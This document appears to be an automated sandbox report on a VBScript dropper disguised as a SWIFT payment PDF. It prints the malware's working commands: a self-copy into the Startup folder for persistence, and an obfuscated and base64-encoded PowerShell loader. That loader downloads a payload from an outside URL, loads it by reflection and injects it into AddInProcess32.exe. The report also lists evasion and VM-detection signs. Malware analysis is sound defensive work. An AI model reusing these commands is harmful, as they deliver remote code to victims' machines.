            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2452048534.00007FF848F10000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IHost.FullName();IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.SpecialFolders("Startup");IFileSystem3.FileExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wernerite.vbs");IFileSystem3.CopyFile("C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs", "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wernerite.vbs");IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJ", "0", "false")
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041A8DA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848CD4FF3 push eax; retf 5_2_00007FF848CD4FE9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848CD00BD pushad ; iretd 5_2_00007FF848CD00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FF848CE2325 push eax; iretd 6_2_00007FF848CE233D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FF848CE00BD pushad ; iretd 6_2_00007FF848CE00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF848CD85A6 push esp; iretd 8_2_00007FF848CD85AC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF848CD0E15 push ds; iretd 8_2_00007FF848CD0E43
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF848CD00BD pushad ; iretd 8_2_00007FF848CD00C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_004000D8 push es; iretd 10_2_004000D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0040008C push es; iretd 10_2_0040008D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_004542E6 push ecx; ret 10_2_004542F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0045B4FD push esi; ret 10_2_0045B506
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00432BD6 push ecx; ret 10_2_00432BE9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00454C08 push eax; ret 10_2_00454C26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_004063C6 ShellExecuteW,URLDownloadToFileW,10_2_004063C6
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,10_2_00418A00
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0040E18D Sleep,ExitProcess,10_2_0040E18D
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,10_2_004186FE
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3488Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1643Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1080Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3946Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5868Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 5766Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 3859Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: foregroundWindowGot 1440Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568 Thread sleep count: 3488 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568 Thread sleep count: 1643 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 348 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716 Thread sleep count: 3946 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748 Thread sleep count: 5868 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276 Thread sleep time: -18446744073709540s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6156 Thread sleep count: 118 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6156 Thread sleep time: -59000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6520 Thread sleep count: 5766 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6520 Thread sleep time: -17298000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6520 Thread sleep count: 3859 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6520 Thread sleep time: -11577000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7436 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_2_0041A01B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_2_0040B28E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_0040838E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_004087A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_2_00407848
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_004068CD FindFirstFileW,FindNextFileW,10_2_004068CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0044BA59 FindFirstFileExA,10_2_0044BA59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0040AA71
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,10_2_00417AAB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0040AC78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,10_2_00406D28
            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
            Source: wscript.exe, 00000000.00000002.2182577413.0000022446C27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ehKiAltTWegWGALbNmWxlGKicoNaLhLSfkgPvmCicLWJRKWZiqxKUhLKLkhLKKLqiloo}T
            Source: svchost.exe, 00000011.00000002.2401514545.0000000002C3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: svchost.exe, 00000056.00000002.3364421731.000000000363F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: svchost.exe, 00000056.00000002.3364696355.0000000003670000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows\SysWOW64\svchost.exe4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f563
            Source: svchost.exe, 00000017.00000002.2503882449.0000000002E3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:s
            Source: svchost.exe, 0000002C.00000002.2772019643.0000000002C79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#
            Source: SWIFT 103 202406111301435660 110624-pdf.vbsBinary or memory string: AikBZKNiiaecplqiKNpKWiKhNGzfUGnKfucgSaRZtnWlobtLLmiLoLPdLCJPiZTWqcRe = "ehKiAltTWegWGALbNmWxlGKicoNaLhLSfkgPvmCicLWJRKWZiqxKUhLKLkhLKKLqiloo"
